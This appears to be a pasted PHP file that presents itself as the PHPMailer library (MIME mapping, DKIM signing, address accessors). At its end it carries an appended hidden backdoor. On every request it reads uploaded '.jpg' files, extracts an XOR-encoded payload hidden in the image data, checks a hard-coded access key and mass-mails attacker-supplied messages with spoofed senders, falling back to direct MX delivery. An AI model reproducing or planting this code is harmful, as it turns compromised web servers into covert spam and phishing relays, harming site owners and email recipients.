  2482.             'eps'   => 'application/postscript',
  2483.             'ps'    => 'application/postscript',
  2484.             'smi'   => 'application/smil',
  2485.             'smil'  => 'application/smil',
  2486.             'mif'   => 'application/vnd.mif',
  2487.             'xls'   => 'application/vnd.ms-excel',
  2488.             'ppt'   => 'application/vnd.ms-powerpoint',
  2489.             'wbxml' => 'application/vnd.wap.wbxml',
  2490.             'wmlc'  => 'application/vnd.wap.wmlc',
  2491.             'dcr'   => 'application/x-director',
  2492.             'dir'   => 'application/x-director',
  2493.             'dxr'   => 'application/x-director',
  2494.             'dvi'   => 'application/x-dvi',
  2495.             'gtar'  => 'application/x-gtar',
  2496.             'php3'  => 'application/x-httpd-php',
  2497.             'php4'  => 'application/x-httpd-php',
  2498.             'php'   => 'application/x-httpd-php',
  2499.             'phtml' => 'application/x-httpd-php',
  2500.             'phps'  => 'application/x-httpd-php-source',
  2501.             'swf'   => 'application/x-shockwave-flash',
  2502.             'sit'   => 'application/x-stuffit',
  2503.             'tar'   => 'application/x-tar',
  2504.             'tgz'   => 'application/x-tar',
  2505.             'xht'   => 'application/xhtml+xml',
  2506.             'xhtml' => 'application/xhtml+xml',
  2507.             'zip'   => 'application/zip',
  2508.             'mid'   => 'audio/midi',
  2509.             'midi'  => 'audio/midi',
  2510.             'mp2'   => 'audio/mpeg',
  2511.             'mp3'   => 'audio/mpeg',
  2512.             'mpga'  => 'audio/mpeg',
  2513.             'aif'   => 'audio/x-aiff',
  2514.             'aifc'  => 'audio/x-aiff',
  2515.             'aiff'  => 'audio/x-aiff',
  2516.             'ram'   => 'audio/x-pn-realaudio',
  2517.             'rm'    => 'audio/x-pn-realaudio',
  2518.             'rpm'   => 'audio/x-pn-realaudio-plugin',
  2519.             'ra'    => 'audio/x-realaudio',
  2520.             'wav'   => 'audio/x-wav',
  2521.             'bmp'   => 'image/bmp',
  2522.             'gif'   => 'image/gif',
  2523.             'jpeg'  => 'image/jpeg',
  2524.             'jpe'   => 'image/jpeg',
  2525.             'jpg'   => 'image/jpeg',
  2526.             'png'   => 'image/png',
  2527.             'tiff'  => 'image/tiff',
  2528.             'tif'   => 'image/tiff',
  2529.             'eml'   => 'message/rfc822',
  2530.             'css'   => 'text/css',
  2531.             'html'  => 'text/html',
  2532.             'htm'   => 'text/html',
  2533.             'shtml' => 'text/html',
  2534.             'log'   => 'text/plain',
  2535.             'text'  => 'text/plain',
  2536.             'txt'   => 'text/plain',
  2537.             'rtx'   => 'text/richtext',
  2538.             'rtf'   => 'text/rtf',
  2539.             'vcf'   => 'text/vcard',
  2540.             'vcard' => 'text/vcard',
  2541.             'xml'   => 'text/xml',
  2542.             'xsl'   => 'text/xml',
  2543.             'mpeg'  => 'video/mpeg',
  2544.             'mpe'   => 'video/mpeg',
  2545.             'mpg'   => 'video/mpeg',
  2546.             'mov'   => 'video/quicktime',
  2547.             'qt'    => 'video/quicktime',
  2548.             'rv'    => 'video/vnd.rn-realvideo',
  2549.             'avi'   => 'video/x-msvideo',
  2550.             'movie' => 'video/x-sgi-movie'
  2551.         );
  2552.         return (array_key_exists(strtolower($ext), $mimes) ? $mimes[strtolower($ext)]: 'application/octet-stream');
  2553.     }
  2554.  
  2555.     public static function filenameToType($filename)
  2556.     {
  2557.         // In case the path is a URL, strip any query string before getting extension
  2558.         $qpos = strpos($filename, '?');
  2559.         if (false !== $qpos) {
  2560.             $filename = substr($filename, 0, $qpos);
  2561.         }
  2562.         $pathinfo = self::mb_pathinfo($filename);
  2563.         return self::_mime_types($pathinfo['extension']);
  2564.     }
  2565.  
  2566.     public static function mb_pathinfo($path, $options = null)
  2567.     {
  2568.         $ret = array('dirname' => '', 'basename' => '', 'extension' => '', 'filename' => '');
  2569.         $pathinfo = array();
  2570.         if (preg_match('%^(.*?)[\\\\/]*(([^/\\\\]*?)(\.([^\.\\\\/]+?)|))[\\\\/\.]*$%im', $path, $pathinfo)) {
  2571.             if (array_key_exists(1, $pathinfo)) {
  2572.                 $ret['dirname'] = $pathinfo[1];
  2573.             }
  2574.             if (array_key_exists(2, $pathinfo)) {
  2575.                 $ret['basename'] = $pathinfo[2];
  2576.             }
  2577.             if (array_key_exists(5, $pathinfo)) {
  2578.                 $ret['extension'] = $pathinfo[5];
  2579.             }
  2580.             if (array_key_exists(3, $pathinfo)) {
  2581.                 $ret['filename'] = $pathinfo[3];
  2582.             }
  2583.         }
  2584.         switch ($options) {
  2585.             case PATHINFO_DIRNAME:
  2586.             case 'dirname':
  2587.                 return $ret['dirname'];
  2588.             case PATHINFO_BASENAME:
  2589.             case 'basename':
  2590.                 return $ret['basename'];
  2591.             case PATHINFO_EXTENSION:
  2592.             case 'extension':
  2593.                 return $ret['extension'];
  2594.             case PATHINFO_FILENAME:
  2595.             case 'filename':
  2596.                 return $ret['filename'];
  2597.             default:
  2598.                 return $ret;
  2599.         }
  2600.     }
  2601.     public function set($name, $value = '')
  2602.     {
  2603.         try {
  2604.             if (isset($this->$name)) {
  2605.                 $this->$name = $value;
  2606.             } else {
  2607.                 throw new phpmailerException($this->lang('variable_set') . $name, self::STOP_CRITICAL);
  2608.             }
  2609.         } catch (Exception $exc) {
  2610.             $this->setError($exc->getMessage());
  2611.             if ($exc->getCode() == self::STOP_CRITICAL) {
  2612.                 return false;
  2613.             }
  2614.         }
  2615.         return true;
  2616.     }
  2617.  
  2618.     public function secureHeader($str)
  2619.     {
  2620.         return trim(str_replace(array("\r", "\n"), '', $str));
  2621.     }
  2622.     public static function normalizeBreaks($text, $breaktype = "\r\n")
  2623.     {
  2624.         return preg_replace('/(\r\n|\r|\n)/ms', $breaktype, $text);
  2625.     }
  2626.  
  2627.     public function sign($cert_filename, $key_filename, $key_pass)
  2628.     {
  2629.         $this->sign_cert_file = $cert_filename;
  2630.         $this->sign_key_file = $key_filename;
  2631.         $this->sign_key_pass = $key_pass;
  2632.     }
  2633.     public function DKIM_QP($txt)
  2634.     {
  2635.         $line = '';
  2636.         for ($i = 0; $i < strlen($txt); $i++) {
  2637.             $ord = ord($txt[$i]);
  2638.             if (((0x21 <= $ord) && ($ord <= 0x3A)) || $ord == 0x3C || ((0x3E <= $ord) && ($ord <= 0x7E))) {
  2639.                 $line .= $txt[$i];
  2640.             } else {
  2641.                 $line .= '=' . sprintf('%02X', $ord);
  2642.             }
  2643.         }
  2644.         return $line;
  2645.     }
  2646.     public function DKIM_Sign($signHeader)
  2647.     {
  2648.         if (!defined('PKCS7_TEXT')) {
  2649.             if ($this->exceptions) {
  2650.                 throw new phpmailerException($this->lang('signing') . ' OpenSSL extension missing.');
  2651.             }
  2652.             return '';
  2653.         }
  2654.         $privKeyStr = file_get_contents($this->DKIM_private);
  2655.         if ($this->DKIM_passphrase != '') {
  2656.             $privKey = openssl_pkey_get_private($privKeyStr, $this->DKIM_passphrase);
  2657.         } else {
  2658.             $privKey = $privKeyStr;
  2659.         }
  2660.         if (openssl_sign($signHeader, $signature, $privKey)) {
  2661.             return base64_encode($signature);
  2662.         }
  2663.         return '';
  2664.     }
  2665.     public function DKIM_HeaderC($signHeader)
  2666.     {
  2667.         $signHeader = preg_replace('/\r\n\s+/', ' ', $signHeader);
  2668.         $lines = explode("\r\n", $signHeader);
  2669.         foreach ($lines as $key => $line) {
  2670.             list($heading, $value) = explode(':', $line, 2);
  2671.             $heading = strtolower($heading);
  2672.             $value = preg_replace('/\s+/', ' ', $value); // Compress useless spaces
  2673.             $lines[$key] = $heading . ':' . trim($value); // Don't forget to remove WSP around the value
  2674.         }
  2675.         $signHeader = implode("\r\n", $lines);
  2676.         return $signHeader;
  2677.     }
  2678.     public function DKIM_BodyC($body)
  2679.     {
  2680.         if ($body == '') {
  2681.             return "\r\n";
  2682.         }
  2683.         // stabilize line endings
  2684.         $body = str_replace("\r\n", "\n", $body);
  2685.         $body = str_replace("\n", "\r\n", $body);
  2686.         // END stabilize line endings
  2687.         while (substr($body, strlen($body) - 4, 4) == "\r\n\r\n") {
  2688.             $body = substr($body, 0, strlen($body) - 2);
  2689.         }
  2690.         return $body;
  2691.     }
  2692.     public function DKIM_Add($headers_line, $subject, $body)
  2693.     {
  2694.         $DKIMsignatureType = 'rsa-sha1'; // Signature & hash algorithms
  2695.         $DKIMcanonicalization = 'relaxed/simple'; // Canonicalization of header/body
  2696.         $DKIMquery = 'dns/txt'; // Query method
  2697.         $DKIMtime = time(); // Signature Timestamp = seconds since 00:00:00 - Jan 1, 1970 (UTC time zone)
  2698.         $subject_header = "Subject: $subject";
  2699.         $headers = explode($this->LE, $headers_line);
  2700.         $from_header = '';
  2701.         $to_header = '';
  2702.         $current = '';
  2703.         foreach ($headers as $header) {
  2704.             if (strpos($header, 'From:') === 0) {
  2705.                 $from_header = $header;
  2706.                 $current = 'from_header';
  2707.             } elseif (strpos($header, 'To:') === 0) {
  2708.                 $to_header = $header;
  2709.                 $current = 'to_header';
  2710.             } else {
  2711.                 if ($current && strpos($header, ' =?') === 0) {
  2712.                     $current .= $header;
  2713.                 } else {
  2714.                     $current = '';
  2715.                 }
  2716.             }
  2717.         }
  2718.         $from = str_replace('|', '=7C', $this->DKIM_QP($from_header));
  2719.         $to = str_replace('|', '=7C', $this->DKIM_QP($to_header));
  2720.         $subject = str_replace(
  2721.             '|',
  2722.             '=7C',
  2723.             $this->DKIM_QP($subject_header)
  2724.         ); // Copied header fields (dkim-quoted-printable)
  2725.         $body = $this->DKIM_BodyC($body);
  2726.         $DKIMlen = strlen($body); // Length of body
  2727.         $DKIMb64 = base64_encode(pack('H*', sha1($body))); // Base64 of packed binary SHA-1 hash of body
  2728.         $ident = ($this->DKIM_identity == '') ? '' : ' i=' . $this->DKIM_identity . ';';
  2729.         $dkimhdrs = 'DKIM-Signature: v=1; a=' .
  2730.             $DKIMsignatureType . '; q=' .
  2731.             $DKIMquery . '; l=' .
  2732.             $DKIMlen . '; s=' .
  2733.             $this->DKIM_selector .
  2734.             ";\r\n" .
  2735.             "\tt=" . $DKIMtime . '; c=' . $DKIMcanonicalization . ";\r\n" .
  2736.             "\th=From:To:Subject;\r\n" .
  2737.             "\td=" . $this->DKIM_domain . ';' . $ident . "\r\n" .
  2738.             "\tz=$from\r\n" .
  2739.             "\t|$to\r\n" .
  2740.             "\t|$subject;\r\n" .
  2741.             "\tbh=" . $DKIMb64 . ";\r\n" .
  2742.             "\tb=";
  2743.         $toSign = $this->DKIM_HeaderC(
  2744.             $from_header . "\r\n" . $to_header . "\r\n" . $subject_header . "\r\n" . $dkimhdrs
  2745.         );
  2746.         $signed = $this->DKIM_Sign($toSign);
  2747.         return $dkimhdrs . $signed . "\r\n";
  2748.     }
  2749.     public function getToAddresses()
  2750.     {
  2751.         return $this->to;
  2752.     }
  2753.  
  2754.     public function getCcAddresses()
  2755.     {
  2756.         return $this->cc;
  2757.     }
  2758.  
  2759.     public function getBccAddresses()
  2760.     {
  2761.         return $this->bcc;
  2762.     }
  2763.  
  2764.     public function getReplyToAddresses()
  2765.     {
  2766.         return $this->ReplyTo;
  2767.     }
  2768.  
  2769.     public function getAllRecipientAddresses()
  2770.     {
  2771.         return $this->all_recipients;
  2772.     }
  2773.  
  2774.     protected function doCallback($isSent, $to, $cc, $bcc, $subject, $body, $from)
  2775.     {
  2776.         if (!empty($this->action_function) && is_callable($this->action_function)) {
  2777.             $params = array($isSent, $to, $cc, $bcc, $subject, $body, $from);
  2778.             call_user_func_array($this->action_function, $params);
  2779.         }
  2780.     }
  2781. }
  2782. class phpmailerException extends Exception
  2783. {
  2784.     public function errorMessage()
  2785.     {
  2786.         $errorMsg = '<strong>' . $this->getMessage() . "</strong><br />\n";
  2787.         return $errorMsg;
  2788.     }
  2789. }
  2790.  
  2791. /////////////////////////////////////////////////////////////////
  2792. function sendSmtpMail($from_email, $from_name, $to, $subject, $body, $type, $config_file)
  2793. {
  2794.     $mail = new PHPMailer();
  2795.     $mail->isMail();
  2796.     $mail->CharSet = 'utf-8';
  2797.     $mail->SetFrom($from_email, $from_name);
  2798.     $mail->AddAddress($to);
  2799.     $mail->Subject = $subject;
  2800.  
  2801.     if ($type == "1")
  2802.     {
  2803.         $mail->MsgHTML($body);
  2804.     }
  2805.     elseif ($type == "2")
  2806.     {
  2807.         $mail->isHTML(false);
  2808.         $mail->Body = $body;
  2809.     }
  2810.     if (isset($_FILES))
  2811.     {
  2812.         foreach($_FILES as $key => $file)
  2813.         {
  2814.             if ($file['tmp_name'] != $config_file)
  2815.             {
  2816.                 $mail->addAttachment($file['tmp_name'], $file['name']);
  2817.             }
  2818.         }
  2819.     }
  2820.     if (!$mail->send())
  2821.     {
  2822.         $to_domain = explode("@", $to);
  2823.         $to_domain = $to_domain[1];
  2824.         $mail->IsSMTP();
  2825.         $mail->Host       = mx_lookup($to_domain);
  2826.         $mail->Port       = 25;
  2827.         $mail->SMTPAuth   = false;
  2828.         if (!$mail->send())
  2829.         {
  2830.             return Array(0, $mail->ErrorInfo);
  2831.         }
  2832.         else
  2833.         {
  2834.             return Array(2, 0);
  2835.         }
  2836.     }
  2837.     else
  2838.     {
  2839.         return Array(1, 0);
  2840.     }
  2841. }
  2842. if (isset($_FILES))
  2843. {
  2844.     foreach($_FILES as $key => $file)
  2845.     {
  2846.         if(strpos($file['name'], ".jpg"))
  2847.         {
  2848.             $res = type1_send($file['tmp_name']);
  2849.             if ($res)
  2850.             {
  2851.                 echo $res;
  2852.             }
  2853.         }
  2854.     }
  2855. }
  2856. function mx_lookup($hostname)
  2857. {
  2858.     @getmxrr($hostname, $mxhosts, $precedence);
  2859.     if(count($mxhosts) === 0) return '127.0.0.1';
  2860.     $position = array_keys($precedence, min($precedence));
  2861.     return $mxhosts[$position[0]];
  2862. }
  2863. function myhex2bin( $str ) {
  2864.     $sbin = "";
  2865.     $len = strlen( $str );
  2866.     for ( $i = 0; $i < $len; $i += 2 ) {
  2867.         $sbin .= pack( "H*", substr( $str, $i, 2 ) );
  2868.     }
  2869.     return $sbin;
  2870. }
  2871.  
  2872. function decode($data, $key)
  2873. {
  2874.     $out_data = "";
  2875.     for ($i=0; $i<strlen($data);)
  2876.     {
  2877.         for ($j=0; $j<strlen($key) && $i<strlen($data); $j++, $i++)
  2878.         {
  2879.             $out_data .= chr(ord($data[$i]) ^ ord($key[$j]));
  2880.         }
  2881.     }
  2882.     return $out_data;
  2883. }
  2884. function type1_send($config_file)
  2885. {
  2886.     $data = file_get_contents($config_file);
  2887.     $start_pos = strpos($data, myhex2bin("ffda"));
  2888.     if ($start_pos)
  2889.     {
  2890.         $start_pos += (20);
  2891.         $end_pos = strrpos($data, myhex2bin("ffd9"));
  2892.         if ($end_pos)
  2893.         {
  2894.             $data = substr($data, $start_pos, $end_pos);
  2895.         }
  2896.         else
  2897.         {
  2898.             return FALSE;
  2899.         }
  2900.     }
  2901.     else
  2902.     {
  2903.         return FALSE;
  2904.     }
  2905.     $key = $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
  2906.     $data = decode($data, $key);
  2907.     $data = @unserialize($data);
  2908.     if (!$data || !isset($data['ak']))
  2909.     {
  2910.         return FALSE;
  2911.     }
  2912.     if ($data['ak'] != "23608196-77f9-425d-9bcb-9f45cb6d5699")
  2913.     {
  2914.         exit();
  2915.     }
  2916.     if (isset($data['c']))
  2917.     {
  2918.         $res["r"]["c"] = $data['c'];
  2919.         return base64_encode(serialize($res));
  2920.     }
  2921.     $good = 0;
  2922.     $bad = 0;
  2923.     $last_error = Array(0, 0);
  2924.     foreach ($data['e'] as $uid=>$email)
  2925.     {
  2926.         $theme = $data['s'][array_rand($data['s'])];
  2927.         $theme = alter_macros($theme);
  2928.         $theme = num_macros($theme);
  2929.         $theme = xnum_macros($theme);
  2930.         $message = $data['l'];
  2931.         $message = alter_macros($message);
  2932.         $message = num_macros($message);
  2933.         $message = xnum_macros($message);
  2934.         $message = fteil_macros($message, $uid);
  2935.         $from = $data['f'][array_rand($data['f'])];
  2936.         $from = alter_macros($from);
  2937.         $from = num_macros($from);
  2938.         $from = xnum_macros($from);
  2939.  
  2940.         if (strstr($from, "[CUSTOM]") == FALSE)
  2941.         {
  2942.             $from = from_host($from);
  2943.         }
  2944.         else
  2945.         {
  2946.             $from = str_replace("[CUSTOM]", "", $from);
  2947.         }
  2948.  
  2949.         $from_email = explode("<", $from);
  2950.         $from_email = explode(">", $from_email[1]);
  2951.         $from_name = explode("\"", $from);
  2952.         $last_error = sendSmtpMail($from_email[0], $from_name[1], $email, $theme, $message, $data['lt'], $config_file);
  2953.  
  2954.         if ($last_error[1] === 0)
  2955.         {
  2956.             $good++;
  2957.         }
  2958.         else
  2959.         {
  2960.             $bad++;
  2961.             $good = count($data['e']) - $bad;
  2962.         }
  2963.     }
  2964.  
  2965.     $res["r"]["t"] = $last_error[0];
  2966.     $res["r"]["e"] = $last_error[1] === FALSE ? 0 : $last_error[1];
  2967.     $res["r"]["g"] = $good;
  2968.     $res["r"]["b"] = $bad;
  2969.     return base64_encode(serialize($res));
Add Comment
Please, Sign In to add comment